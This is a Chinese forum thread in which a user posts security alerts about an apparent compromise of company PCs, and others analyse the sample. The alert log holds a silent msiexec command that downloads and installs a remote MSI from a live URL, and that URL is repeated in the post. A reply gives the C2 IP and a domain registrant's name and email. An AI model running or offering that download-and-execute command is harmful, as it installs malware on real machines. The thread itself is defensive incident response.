网站 › 『病毒救援区』 › 就在刚刚公司电脑全部被沦陷了，有没有大佬分析下

Yansongwei 发表于 2023-4-12 02:03

就在刚刚公司电脑全部被沦陷了，有没有大佬分析下

本帖最后由 Yansongwei 于 2023-4-12 02:06 编辑

事件等级 : 可疑 ⚠️⚠️⚠️ 事件时间 : 2023-04-11 22:28:22 事件主机 : OM-VM-0009 事件的ID : aae9d6c560c186225877f147f6dfd666 事件主机IP: 172.21.202.76 / None 事件的名称: 可疑的进程路径 事件的类型: 进程异常行为 攻击阶段 : 防御绕过 事件详情 : 提示: 在您的系统上发现一个可疑进程, 可能与蠕虫病毒或入侵事件相关. 告警原因: 该进程文件路径伪装成了一个正常的系统文件，但实际执行的进程内部代码已被替换为其他内容。 用户名: - 命令行: "C:\Windows\SysWOW64\dllhost.exe" 进程路径: C:/Windows/SysWOW64/dllhost.exe 进程ID: 45228 父进程命令行: C:\ProgramData\CdnSvc\dwm.exe 父进程文件路径: C:/ProgramData/CdnSvc/dwm.exe 父进程ID: 72336 MD5: - K8s集群ID: - K8s节点ID: - 容器ID: - 镜像ID: - 容器hostname: - 容器主ip: - 容器视角进程路径: - 容器挂载的宿主机目录: - 容器内挂载点: - 容器视角文件路径: - 描述: 检测模型发现您服务器上某个进程从一个不寻常的路径启动，常规软件通常不会在这种目录中，该进程有可能是病毒、木马、黑客入侵过程中放置的工具。 处置建议: 请先判断该命令是否是运维操作或业务正常的命令, 如果是, 请忽略该告警. 如果您在处理告警时此进程仍然存在, 建议先尝试kill进程避免后续进一步行为. 该命令可能仅是攻击者入侵过程中的其中一步, 请继续查看该机器的其他告警或排查日志, 分析是否还存在其他恶意行为.


事件等级 : 可疑 ⚠️⚠️⚠️ 事件时间 : 2023-04-12 01:00:38 事件主机 : OM-VM-0053 事件的ID : ba1f34e486fcccb3cb0249a250dedf43 事件主机IP: 172.21.202.90 / None 事件的名称: 异常调用系统工具 事件的类型: 进程异常行为 攻击阶段 : 防御绕过 事件详情 : 提示: 在您的系统上发现一个可疑进程, 可能与蠕虫病毒或入侵事件相关. ATT&CK 矩阵ID: T1218.007 系统工具: Msiexec 意图: 执行代码 命令行: msiexec /q /i https://chuanqiliebiao-1314.oss-cn-shanghai.aliyuncs.com/wp-content/plugins/update.msi 命令行: - 进程路径: C:/Windows/System32/msiexec.exe 进程ID: 495664 父进程命令行: cmd.exe /C msiexec /q /i https://chuanqiliebiao-1314.oss-cn-shanghai.aliyuncs.com/wp-content/plugins/update.msi 父进程文件路径: C:/Windows/System32/cmd.exe 父进程ID: 516424 描述: 检测模型发现您服务器上有进程正以一种可疑方式的调用系统工具，木马病毒或黑客常常会通过这种方式绕过常规的安全软件来下载恶意文件、加载恶意代码、执行加解密操作等其他恶意操作。 处置建议: 请先判断该命令是否是运维操作或业务正常的命令, 如果是, 请忽略该告警. 如果您在处理告警时此进程仍然存在, 建议先尝试kill进程避免后续进一步行为. 该命令可能仅是攻击者入侵过程中的其中一步, 请继续查看该机器的其他告警或排查日志, 分析是否还存在其他恶意行为. ---


https://chuanqiliebiao-1314.oss-cn-shanghai.aliyuncs.com/wp-content/plugins/update.msi

QingTianGG 发表于 2023-4-12 11:36

本帖最后由 QingTianGG 于 2023-4-12 11:44 编辑

<root>
<server RmtMode="0" Address="154.211.18.93" />
</root>

反查域名du9x3sl.cn
注册域名:
du9x3sl.cn
注册时间:
2022-01-17 20:38:43
注册人:
李宗义
到期时间:
2024-01-17 20:38:43
联系邮箱:
3051089115@qq.com

直接解压可以看到是个客户端


网上找到解决办法
https://blog.csdn.net/qq_20490175/article/details/119282772

建议同步在出口防火墙拦截IP地址154.211.18.93

52new 发表于 2023-4-12 10:01

症状是。也不描述下

youngnku 发表于 2023-4-12 10:10

这发的啥呀，到底是啥情况也不描述一下，还不如不发

ztgzs 发表于 2023-4-12 10:25

dll劫持？

cyxnzb 发表于 2023-4-12 10:29

被传奇私服攻击了？

ll2 发表于 2023-4-12 10:39

下面是链接，链接里估计是样本，上面是安全设备告警记录或日志吧

xaibin 发表于 2023-4-12 10:47

好像看到了什么，又好像什么都没看到。

车同学 发表于 2023-4-12 11:03

我们公司要求所有电脑安装火绒。我个人觉得火绒好安静啊，到底管不管用

wwyl 发表于 2023-4-12 11:05

不明所以，看不明白

cn2jp 发表于 2023-4-12 11:22

车同学 发表于 2023-4-12 11:03
我们公司要求所有电脑安装火绒。我个人觉得火绒好安静啊，到底管不管用

同感。好像主动防御不太行，被动的还可以。

查看完整版本: 就在刚刚公司电脑全部被沦陷了，有没有大佬分析下